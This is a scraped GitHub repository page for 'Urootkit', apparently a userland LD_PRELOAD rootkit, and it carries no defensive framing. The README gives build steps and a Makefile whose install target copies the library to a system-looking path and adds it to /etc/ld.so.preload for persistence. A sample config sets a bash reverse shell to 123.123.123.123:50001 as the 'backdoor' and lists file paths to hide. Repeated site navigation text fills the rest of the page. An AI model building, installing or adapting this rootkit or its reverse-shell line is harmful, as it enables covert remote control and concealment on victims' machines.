Urootkit

The userland LD_PRELOAD rootkit Reference: https://github.com/ngn13/cerez

Make

apt update && apt install build-essential libconfig-dev

make && make install

Makefile:

SRCS = $(wildcard *.c)
HEADERS = $(wildcard *.h)

dist/loader.so: $(SRCS) $(HEADERS)
	mkdir -p dist
	gcc -shared -fPIC $(SRCS) -o $@ -ldl -lconfig -nostartfiles

install:
	cp ukk_root.cfg /etc/ukk_root.cfg
	cp dist/loader.so /lib/sysutils.so 
	echo /lib/sysutils.so > /etc/ld.so.preload

USE

ukk_root.cfg:

backdoor = "bash -c 'bash -i >& /dev/tcp/123.123.123.123/50001 0>&1'";

hidden = (  
  { path = "/etc/uroot.cfg" },
  { path = "/tmp/test" }
);

backdoor: is the urootkit will do when the hooked function is runing
hidden: the path you want to hide

Name		Name	Last commit message	Last commit date
Latest commit History 7 Commits
dist		dist
Makefile		Makefile
Readme.md		Readme.md
config.c		config.c
config.h		config.h
ldpre.c		ldpre.c
log.c		log.c
log.h		log.h
ukk_root.cfg		ukk_root.cfg
util.c		util.c
util.h		util.h

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Urootkit

Make

USE

About

Releases

Packages

Languages

Alex0Young/Urootkit

Folders and files

Latest commit

History

Repository files navigation

Urootkit

Make

USE

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages